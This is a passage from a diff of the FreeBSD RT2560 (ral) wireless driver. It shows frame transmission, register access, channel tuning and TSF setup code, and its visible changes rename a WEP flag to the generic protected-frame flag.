error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; rt2560_setup_tx_desc(sc, desc, RT2560_TX_IFS_NEWBACKOFF | RT2560_TX_TIMESTAMP, m0->m_pkthdr.len, rate, 0, segs->ds_addr); DPRINTFN(sc, 10, "sending beacon frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->bcnq.cur, rate); bus_dmamap_sync(sc->bcnq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->bcnq.desc_dmat, sc->bcnq.desc_map, BUS_DMASYNC_PREWRITE); sc->bcnq.cur = (sc->bcnq.cur + 1) % RT2560_BEACON_RING_COUNT; return 0; } static int rt2560_tx_mgt(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct ieee80211_frame *wh; struct ieee80211_key *k; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; uint16_t dur; uint32_t flags = 0; int nsegs, rate, error; desc = &sc->prioq.desc[sc->prioq.cur]; data = &sc->prioq.data[sc->prioq.cur]; rate = vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)].mgmtrate; wh = mtod(m0, struct ieee80211_frame *); - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } } error = bus_dmamap_load_mbuf_sg(sc->prioq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* management frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; wh = mtod(m0, struct ieee80211_frame *); if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2560_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); /* tell hardware to add timestamp for probe responses */ if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_MGT && (wh->i_fc[0] & IEEE80211_FC0_SUBTYPE_MASK) == IEEE80211_FC0_SUBTYPE_PROBE_RESP) flags |= RT2560_TX_TIMESTAMP; } rt2560_setup_tx_desc(sc, desc, flags, m0->m_pkthdr.len, rate, 0, segs->ds_addr); bus_dmamap_sync(sc->prioq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending mgt frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->prioq.cur, rate); /* kick prio */ sc->prioq.queued++; sc->prioq.cur = (sc->prioq.cur + 1) % RT2560_PRIO_RING_COUNT; RAL_WRITE(sc, RT2560_TXCSR0, RT2560_KICK_PRIO); return 0; } static int rt2560_sendprot(struct rt2560_softc *sc, const struct mbuf *m, struct ieee80211_node *ni, int prot, int rate) { struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_frame *wh; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct mbuf *mprot; int protrate, ackrate, pktlen, flags, isshort, error; uint16_t dur; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; int nsegs; KASSERT(prot == IEEE80211_PROT_RTSCTS || prot == IEEE80211_PROT_CTSONLY, ("protection %d", prot)); wh = mtod(m, const struct ieee80211_frame *); pktlen = m->m_pkthdr.len + IEEE80211_CRC_LEN; protrate = ieee80211_ctl_rate(ic->ic_rt, rate); ackrate = ieee80211_ack_rate(ic->ic_rt, rate); isshort = (ic->ic_flags & IEEE80211_F_SHPREAMBLE) != 0; dur = ieee80211_compute_duration(ic->ic_rt, pktlen, rate, isshort) + ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags = RT2560_TX_MORE_FRAG; if (prot == IEEE80211_PROT_RTSCTS) { /* NB: CTS is the same size as an ACK */ dur += ieee80211_ack_duration(ic->ic_rt, rate, isshort); flags |= RT2560_TX_ACK; mprot = ieee80211_alloc_rts(ic, wh->i_addr1, wh->i_addr2, dur); } else { mprot = ieee80211_alloc_cts(ic, ni->ni_vap->iv_myaddr, dur); } if (mprot == NULL) { /* XXX stat + msg */ return ENOBUFS; } desc = &sc->txq.desc[sc->txq.cur_encrypt]; data = &sc->txq.data[sc->txq.cur_encrypt]; error = bus_dmamap_load_mbuf_sg(sc->txq.data_dmat, data->map, mprot, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(mprot); return error; } data->m = mprot; data->ni = ieee80211_ref_node(ni); /* ctl frames are not taken into account for amrr */ data->rix = IEEE80211_FIXED_RATE_NONE; rt2560_setup_tx_desc(sc, desc, flags, mprot->m_pkthdr.len, protrate, 1, segs->ds_addr); bus_dmamap_sync(sc->txq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); sc->txq.queued++; sc->txq.cur_encrypt = (sc->txq.cur_encrypt + 1) % RT2560_TX_RING_COUNT; return 0; } static int rt2560_tx_raw(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni, const struct ieee80211_bpf_params *params) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; uint32_t flags; int nsegs, rate, error; desc = &sc->prioq.desc[sc->prioq.cur]; data = &sc->prioq.data[sc->prioq.cur]; rate = params->ibp_rate0; if (!ieee80211_isratevalid(ic->ic_rt, rate)) { /* XXX fall back to mcast/mgmt rate? */ m_freem(m0); return EINVAL; } flags = 0; if ((params->ibp_flags & IEEE80211_BPF_NOACK) == 0) flags |= RT2560_TX_ACK; if (params->ibp_flags & (IEEE80211_BPF_RTS|IEEE80211_BPF_CTS)) { error = rt2560_sendprot(sc, m0, ni, params->ibp_flags & IEEE80211_BPF_RTS ? IEEE80211_PROT_RTSCTS : IEEE80211_PROT_CTSONLY, rate); if (error) { m_freem(m0); return error; } flags |= RT2560_TX_LONG_RETRY | RT2560_TX_IFS_SIFS; } error = bus_dmamap_load_mbuf_sg(sc->prioq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(ni->ni_vap, m0); } data->m = m0; data->ni = ni; /* XXX need to setup descriptor ourself */ rt2560_setup_tx_desc(sc, desc, flags, m0->m_pkthdr.len, rate, (params->ibp_flags & IEEE80211_BPF_CRYPTO) != 0, segs->ds_addr); bus_dmamap_sync(sc->prioq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->prioq.desc_dmat, sc->prioq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending raw frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->prioq.cur, rate); /* kick prio */ sc->prioq.queued++; sc->prioq.cur = (sc->prioq.cur + 1) % RT2560_PRIO_RING_COUNT; RAL_WRITE(sc, RT2560_TXCSR0, RT2560_KICK_PRIO); return 0; } static int rt2560_tx_data(struct rt2560_softc *sc, struct mbuf *m0, struct ieee80211_node *ni) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct rt2560_tx_desc *desc; struct rt2560_tx_data *data; struct ieee80211_frame *wh; const struct ieee80211_txparam *tp; struct ieee80211_key *k; struct mbuf *mnew; bus_dma_segment_t segs[RT2560_MAX_SCATTER]; uint16_t dur; uint32_t flags; int nsegs, rate, error; wh = mtod(m0, struct ieee80211_frame *); tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (IEEE80211_IS_MULTICAST(wh->i_addr1)) { rate = tp->mcastrate; } else if (m0->m_flags & M_EAPOL) { rate = tp->mgmtrate; } else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) { rate = tp->ucastrate; } else { (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { k = ieee80211_crypto_encap(ni, m0); if (k == NULL) { m_freem(m0); return ENOBUFS; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { int prot = IEEE80211_PROT_NONE; if (m0->m_pkthdr.len + IEEE80211_CRC_LEN > vap->iv_rtsthreshold) prot = IEEE80211_PROT_RTSCTS; else if ((ic->ic_flags & IEEE80211_F_USEPROT) && ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_OFDM) prot = ic->ic_protmode; if (prot != IEEE80211_PROT_NONE) { error = rt2560_sendprot(sc, m0, ni, prot, rate); if (error) { m_freem(m0); return error; } flags |= RT2560_TX_LONG_RETRY | RT2560_TX_IFS_SIFS; } } data = &sc->txq.data[sc->txq.cur_encrypt]; desc = &sc->txq.desc[sc->txq.cur_encrypt]; error = bus_dmamap_load_mbuf_sg(sc->txq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0 && error != EFBIG) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } if (error != 0) { mnew = m_defrag(m0, M_NOWAIT); if (mnew == NULL) { device_printf(sc->sc_dev, "could not defragment mbuf\n"); m_freem(m0); return ENOBUFS; } m0 = mnew; error = bus_dmamap_load_mbuf_sg(sc->txq.data_dmat, data->map, m0, segs, &nsegs, 0); if (error != 0) { device_printf(sc->sc_dev, "could not map mbuf (error %d)\n", error); m_freem(m0); return error; } /* packet header may have moved, reset our local pointer */ wh = mtod(m0, struct ieee80211_frame *); } if (ieee80211_radiotap_active_vap(vap)) { struct rt2560_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; tap->wt_antenna = sc->tx_ant; ieee80211_radiotap_tx(vap, m0); } data->m = m0; data->ni = ni; /* remember link conditions for rate adaptation algorithm */ if (tp->ucastrate == IEEE80211_FIXED_RATE_NONE) { data->rix = ni->ni_txrate; /* XXX probably need last rssi value and not avg */ data->rssi = ic->ic_node_getrssi(ni); } else data->rix = IEEE80211_FIXED_RATE_NONE; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { flags |= RT2560_TX_ACK; dur = ieee80211_ack_duration(ic->ic_rt, rate, ic->ic_flags & IEEE80211_F_SHPREAMBLE); *(uint16_t *)wh->i_dur = htole16(dur); } rt2560_setup_tx_desc(sc, desc, flags, m0->m_pkthdr.len, rate, 1, segs->ds_addr); bus_dmamap_sync(sc->txq.data_dmat, data->map, BUS_DMASYNC_PREWRITE); bus_dmamap_sync(sc->txq.desc_dmat, sc->txq.desc_map, BUS_DMASYNC_PREWRITE); DPRINTFN(sc, 10, "sending data frame len=%u idx=%u rate=%u\n", m0->m_pkthdr.len, sc->txq.cur_encrypt, rate); /* kick encrypt */ sc->txq.queued++; sc->txq.cur_encrypt = (sc->txq.cur_encrypt + 1) % RT2560_TX_RING_COUNT; RAL_WRITE(sc, RT2560_SECCSR1, RT2560_KICK_ENCRYPT); return 0; } static void rt2560_start_locked(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; struct mbuf *m; struct ieee80211_node *ni; RAL_LOCK_ASSERT(sc); for (;;) { IFQ_DRV_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; if (sc->txq.queued >= RT2560_TX_RING_COUNT - 1) { IFQ_DRV_PREPEND(&ifp->if_snd, m); ifp->if_drv_flags |= IFF_DRV_OACTIVE; sc->sc_flags |= RT2560_F_DATA_OACTIVE; break; } ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; if (rt2560_tx_data(sc, m, ni) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; break; } sc->sc_tx_timer = 5; } } static void rt2560_start(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2560_start_locked(ifp); RAL_UNLOCK(sc); } static void rt2560_watchdog(void *arg) { struct rt2560_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; RAL_LOCK_ASSERT(sc); KASSERT(ifp->if_drv_flags & IFF_DRV_RUNNING, ("not running")); if (sc->sc_invalid) /* card ejected */ return; rt2560_encryption_intr(sc); rt2560_tx_intr(sc); if (sc->sc_tx_timer > 0 && --sc->sc_tx_timer == 0) { if_printf(ifp, "device timeout\n"); rt2560_init_locked(sc); ifp->if_oerrors++; /* NB: callout is reset in rt2560_init() */ return; } callout_reset(&sc->watchdog_ch, hz, rt2560_watchdog, sc); } static int rt2560_ioctl(struct ifnet *ifp, u_long cmd, caddr_t data) { struct rt2560_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct ifreq *ifr = (struct ifreq *) data; int error = 0, startall = 0; switch (cmd) { case SIOCSIFFLAGS: RAL_LOCK(sc); if (ifp->if_flags & IFF_UP) { if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) { rt2560_init_locked(sc); startall = 1; } else rt2560_update_promisc(ifp); } else { if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2560_stop_locked(sc); } RAL_UNLOCK(sc); if (startall) ieee80211_start_all(ic); break; case SIOCGIFMEDIA: error = ifmedia_ioctl(ifp, ifr, &ic->ic_media, cmd); break; case SIOCGIFADDR: error = ether_ioctl(ifp, cmd, data); break; default: error = EINVAL; break; } return error; } static void rt2560_bbp_write(struct rt2560_softc *sc, uint8_t reg, uint8_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2560_BBPCSR) & RT2560_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to BBP\n"); return; } tmp = RT2560_BBP_WRITE | RT2560_BBP_BUSY | reg << 8 | val; RAL_WRITE(sc, RT2560_BBPCSR, tmp); DPRINTFN(sc, 15, "BBP R%u <- 0x%02x\n", reg, val); } static uint8_t rt2560_bbp_read(struct rt2560_softc *sc, uint8_t reg) { uint32_t val; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2560_BBPCSR) & RT2560_BBP_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } val = RT2560_BBP_BUSY | reg << 8; RAL_WRITE(sc, RT2560_BBPCSR, val); for (ntries = 0; ntries < 100; ntries++) { val = RAL_READ(sc, RT2560_BBPCSR); if (!(val & RT2560_BBP_BUSY)) return val & 0xff; DELAY(1); } device_printf(sc->sc_dev, "could not read from BBP\n"); return 0; } static void rt2560_rf_write(struct rt2560_softc *sc, uint8_t reg, uint32_t val) { uint32_t tmp; int ntries; for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2560_RFCSR) & RT2560_RF_BUSY)) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "could not write to RF\n"); return; } tmp = RT2560_RF_BUSY | RT2560_RF_20BIT | (val & 0xfffff) << 2 | (reg & 0x3); RAL_WRITE(sc, RT2560_RFCSR, tmp); /* remember last written value in sc */ sc->rf_regs[reg] = val; DPRINTFN(sc, 15, "RF R[%u] <- 0x%05x\n", reg & 0x3, val & 0xfffff); } static void rt2560_set_chan(struct rt2560_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint8_t power, tmp; u_int i, chan; chan = ieee80211_chan2ieee(ic, c); KASSERT(chan != 0 && chan != IEEE80211_CHAN_ANY, ("chan 0x%x", chan)); if (IEEE80211_IS_CHAN_2GHZ(c)) power = min(sc->txpow[chan - 1], 31); else power = 31; /* adjust txpower using ifconfig settings */ power -= (100 - ic->ic_txpowlimit) / 8; DPRINTFN(sc, 2, "setting channel to %u, txpower to %u\n", chan, power); switch (sc->rf_rev) { case RT2560_RF_2522: rt2560_rf_write(sc, RAL_RF1, 0x00814); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2522_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x00040); break; case RT2560_RF_2523: rt2560_rf_write(sc, RAL_RF1, 0x08804); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2523_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x38044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RT2560_RF_2524: rt2560_rf_write(sc, RAL_RF1, 0x0c808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2524_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x00040); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RT2560_RF_2525: rt2560_rf_write(sc, RAL_RF1, 0x08808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2525_hi_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); rt2560_rf_write(sc, RAL_RF1, 0x08808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2525_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00280 : 0x00286); break; case RT2560_RF_2525E: rt2560_rf_write(sc, RAL_RF1, 0x08808); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2525e_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan == 14) ? 0x00286 : 0x00282); break; case RT2560_RF_2526: rt2560_rf_write(sc, RAL_RF2, rt2560_rf2526_hi_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF4, (chan & 1) ? 0x00386 : 0x00381); rt2560_rf_write(sc, RAL_RF1, 0x08804); rt2560_rf_write(sc, RAL_RF2, rt2560_rf2526_r2[chan - 1]); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x18044); rt2560_rf_write(sc, RAL_RF4, (chan & 1) ? 0x00386 : 0x00381); break; /* dual-band RF */ case RT2560_RF_5222: for (i = 0; rt2560_rf5222[i].chan != chan; i++); rt2560_rf_write(sc, RAL_RF1, rt2560_rf5222[i].r1); rt2560_rf_write(sc, RAL_RF2, rt2560_rf5222[i].r2); rt2560_rf_write(sc, RAL_RF3, power << 7 | 0x00040); rt2560_rf_write(sc, RAL_RF4, rt2560_rf5222[i].r4); break; default: printf("unknown ral rev=%d\n", sc->rf_rev); } /* XXX */ if ((ic->ic_flags & IEEE80211_F_SCAN) == 0) { /* set Japan filter bit for channel 14 */ tmp = rt2560_bbp_read(sc, 70); tmp &= ~RT2560_JAPAN_FILTER; if (chan == 14) tmp |= RT2560_JAPAN_FILTER; rt2560_bbp_write(sc, 70, tmp); /* clear CRC errors */ RAL_READ(sc, RT2560_CNT0); } } static void rt2560_set_channel(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; RAL_LOCK(sc); rt2560_set_chan(sc, ic->ic_curchan); RAL_UNLOCK(sc); } #if 0 /* * Disable RF auto-tuning. */ static void rt2560_disable_rf_tune(struct rt2560_softc *sc) { uint32_t tmp; if (sc->rf_rev != RT2560_RF_2523) { tmp = sc->rf_regs[RAL_RF1] & ~RAL_RF1_AUTOTUNE; rt2560_rf_write(sc, RAL_RF1, tmp); } tmp = sc->rf_regs[RAL_RF3] & ~RAL_RF3_AUTOTUNE; rt2560_rf_write(sc, RAL_RF3, tmp); DPRINTFN(sc, 2, "%s", "disabling RF autotune\n"); } #endif /* * Refer to IEEE Std 802.11-1999 pp. 123 for more information on TSF * synchronization. */ static void rt2560_enable_tsf_sync(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint16_t logcwmin, preload; uint32_t tmp; /* first, disable TSF synchronization */ RAL_WRITE(sc, RT2560_CSR14, 0); tmp = 16 * vap->iv_bss->ni_intval; RAL_WRITE(sc, RT2560_CSR12, tmp); RAL_WRITE(sc, RT2560_CSR13, 0); logcwmin = 5; preload = (vap->iv_opmode == IEEE80211_M_STA) ? 384 : 1024; tmp = logcwmin << 16 | preload; RAL_WRITE(sc, RT2560_BCNOCSR, tmp); /* finally, enable TSF synchronization */ tmp = RT2560_ENABLE_TSF | RT2560_ENABLE_TBCN; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RT2560_ENABLE_TSF_SYNC(1); else tmp |= RT2560_ENABLE_TSF_SYNC(2) | RT2560_ENABLE_BEACON_GENERATOR; RAL_WRITE(sc, RT2560_CSR14, tmp); DPRINTF(sc, "%s", "enabling TSF synchronization\n"); } static void rt2560_enable_tsf(struct rt2560_softc *sc) { RAL_WRITE(sc, RT2560_CSR14, 0); RAL_WRITE(sc, RT2560_CSR14, RT2560_ENABLE_TSF_SYNC(2) | RT2560_ENABLE_TSF); } static void rt2560_update_plcp(struct rt2560_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; /* no short preamble for 1Mbps */ RAL_WRITE(sc, RT2560_PLCP1MCSR, 0x00700400); if (!(ic->ic_flags & IEEE80211_F_SHPREAMBLE)) { /* values taken from the reference driver */ RAL_WRITE(sc, RT2560_PLCP2MCSR, 0x00380401); RAL_WRITE(sc, RT2560_PLCP5p5MCSR, 0x00150402); RAL_WRITE(sc, RT2560_PLCP11MCSR, 0x000b8403); } else { /* same values as above or'ed 0x8 */ RAL_WRITE(sc, RT2560_PLCP2MCSR, 0x00380409); RAL_WRITE(sc, RT2560_PLCP5p5MCSR, 0x0015040a); RAL_WRITE(sc, RT2560_PLCP11MCSR, 0x000b840b); } DPRINTF(sc, "updating PLCP for %s preamble\n", (ic->ic_flags & IEEE80211_F_SHPREAMBLE) ? "short" : "long"); } /* * This function can be called by ieee80211_set_shortslottime(). Refer to * IEEE Std 802.11-1999 pp. 85 to know how these values are computed. */ static void rt2560_update_slot(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; uint8_t slottime; uint16_t tx_sifs, tx_pifs, tx_difs, eifs; uint32_t tmp; #ifndef FORCE_SLOTTIME slottime = (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20; #else /* * Setting slot time according to "short slot time" capability * in beacon/probe_resp seems to cause problem to acknowledge * certain AP's data frames transimitted at CCK/DS rates: the * problematic AP keeps retransmitting data frames, probably * because MAC level acks are not received by hardware. * So we cheat a little bit here by claiming we are capable of * "short slot time" but setting hardware slot time to the normal * slot time. ral(4) does not seem to have trouble to receive * frames transmitted using short slot time even if hardware * slot time is set to normal slot time. If we didn't use this * trick, we would have to claim that short slot time is not * supported; this would give relative poor RX performance * (-1Mb~-2Mb lower) and the _whole_ BSS would stop using short * slot time. */ slottime = 20; #endif /* update the MAC slot boundaries */ tx_sifs = RAL_SIFS - RT2560_TXRX_TURNAROUND; tx_pifs = tx_sifs + slottime; tx_difs = tx_sifs + 2 * slottime; eifs = (ic->ic_curmode == IEEE80211_MODE_11B) ? 364 : 60; tmp = RAL_READ(sc, RT2560_CSR11); tmp = (tmp & ~0x1f00) | slottime << 8; RAL_WRITE(sc, RT2560_CSR11, tmp); tmp = tx_pifs << 16 | tx_sifs; RAL_WRITE(sc, RT2560_CSR18, tmp); tmp = eifs << 16 | tx_difs; RAL_WRITE(sc, RT2560_CSR19, tmp); DPRINTF(sc, "setting slottime to %uus\n", slottime); } static void rt2560_set_basicrates(struct rt2560_softc *sc, const struct ieee80211_rateset *rs) { #define RV(r) ((r) & IEEE80211_RATE_VAL) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t mask = 0; uint8_t rate; int i; for (i = 0; i < rs->rs_nrates; i++) { rate = rs->rs_rates[i]; if (!(rate & IEEE80211_RATE_BASIC)) continue; mask |= 1 << ieee80211_legacy_rate_lookup(ic->ic_rt, RV(rate)); } RAL_WRITE(sc, RT2560_ARSP_PLCP_1, mask); DPRINTF(sc, "Setting basic rate mask to 0x%x\n", mask); #undef RV } static void rt2560_update_led(struct rt2560_softc *sc, int led1, int led2) { uint32_t tmp; /* set ON period to 70ms and OFF period to 30ms */ tmp = led1 << 16 | led2 << 17 | 70 << 8 | 30; RAL_WRITE(sc, RT2560_LEDCSR, tmp); } static void rt2560_set_bssid(struct rt2560_softc *sc, const uint8_t *bssid) { uint32_t tmp; tmp = bssid[0] | bssid[1] << 8 | bssid[2] << 16 | bssid[3] << 24; RAL_WRITE(sc, RT2560_CSR5, tmp); tmp = bssid[4] | bssid[5] << 8; RAL_WRITE(sc, RT2560_CSR6, tmp); DPRINTF(sc, "setting BSSID to %6D\n", bssid, ":"); } static void rt2560_set_macaddr(struct rt2560_softc *sc, uint8_t *addr) { uint32_t tmp; tmp = addr[0] | addr[1] << 8 | addr[2] << 16 | addr[3] << 24; RAL_WRITE(sc, RT2560_CSR3, tmp); tmp = addr[4] | addr[5] << 8; RAL_WRITE(sc, RT2560_CSR4, tmp); DPRINTF(sc, "setting MAC address to %6D\n", addr, ":"); } static void rt2560_get_macaddr(struct rt2560_softc *sc, uint8_t *addr) { uint32_t tmp; tmp = RAL_READ(sc, RT2560_CSR3); addr[0] = tmp & 0xff; addr[1] = (tmp >> 8) & 0xff; addr[2] = (tmp >> 16) & 0xff; addr[3] = (tmp >> 24); tmp = RAL_READ(sc, RT2560_CSR4); addr[4] = tmp & 0xff; addr[5] = (tmp >> 8) & 0xff; } static void rt2560_update_promisc(struct ifnet *ifp) { struct rt2560_softc *sc = ifp->if_softc; uint32_t tmp; tmp = RAL_READ(sc, RT2560_RXCSR0); tmp &= ~RT2560_DROP_NOT_TO_ME; if (!(ifp->if_flags & IFF_PROMISC)) tmp |= RT2560_DROP_NOT_TO_ME; RAL_WRITE(sc, RT2560_RXCSR0, tmp); DPRINTF(sc, "%s promiscuous mode\n", (ifp->if_flags & IFF_PROMISC) ? "entering" : "leaving"); } static const char * rt2560_get_rf(int rev) { switch (rev) { case RT2560_RF_2522: return "RT2522"; case RT2560_RF_2523: return "RT2523"; case RT2560_RF_2524: return "RT2524"; case RT2560_RF_2525: return "RT2525"; case RT2560_RF_2525E: return "RT2525e"; case RT2560_RF_2526: return "RT2526"; case RT2560_RF_5222: return "RT5222"; default: return "unknown"; } } static void rt2560_read_config(struct rt2560_softc *sc) { uint16_t val; int i; val = rt2560_eeprom_read(sc, RT2560_EEPROM_CONFIG0); sc->rf_rev = (val >> 11) & 0x7; sc->hw_radio = (val >> 10) & 0x1; sc->led_mode = (val >> 6) & 0x7; sc->rx_ant = (val >> 4) & 0x3; sc->tx_ant = (val >> 2) & 0x3; sc->nb_ant = val & 0x3; /* read default values for BBP registers */ for (i = 0; i < 16; i++) { val = rt2560_eeprom_read(sc, RT2560_EEPROM_BBP_BASE + i); if (val == 0 || val == 0xffff) continue; sc->bbp_prom[i].reg = val >> 8; sc->bbp_prom[i].val = val & 0xff; } /* read Tx power for all b/g channels */ for (i = 0; i < 14 / 2; i++) { val = rt2560_eeprom_read(sc, RT2560_EEPROM_TXPOWER + i); sc->txpow[i * 2] = val & 0xff; sc->txpow[i * 2 + 1] = val >> 8; } for (i = 0; i < 14; ++i) { if (sc->txpow[i] > 31) sc->txpow[i] = 24; } val = rt2560_eeprom_read(sc, RT2560_EEPROM_CALIBRATE); if ((val & 0xff) == 0xff) sc->rssi_corr = RT2560_DEFAULT_RSSI_CORR; else sc->rssi_corr = val & 0xff; DPRINTF(sc, "rssi correction %d, calibrate 0x%02x\n", sc->rssi_corr, val); } static void rt2560_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; /* abort TSF synchronization */ RAL_WRITE(sc, RT2560_CSR14, 0); rt2560_set_bssid(sc, ifp->if_broadcastaddr); } static void rt2560_scan_end(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct rt2560_softc *sc = ifp->if_softc; struct ieee80211vap *vap = ic->ic_scan->ss_vap; rt2560_enable_tsf_sync(sc); /* XXX keep local copy */ rt2560_set_bssid(sc, vap->iv_bss->ni_bssid); } static int rt2560_bbp_init(struct rt2560_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) int i, ntries; /* wait for BBP to be ready */ for (ntries = 0; ntries < 100; ntries++) { if (rt2560_bbp_read(sc, RT2560_BBP_VERSION) != 0) break; DELAY(1); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for BBP\n"); return EIO; } /* initialize BBP registers to default values */ for (i = 0; i < 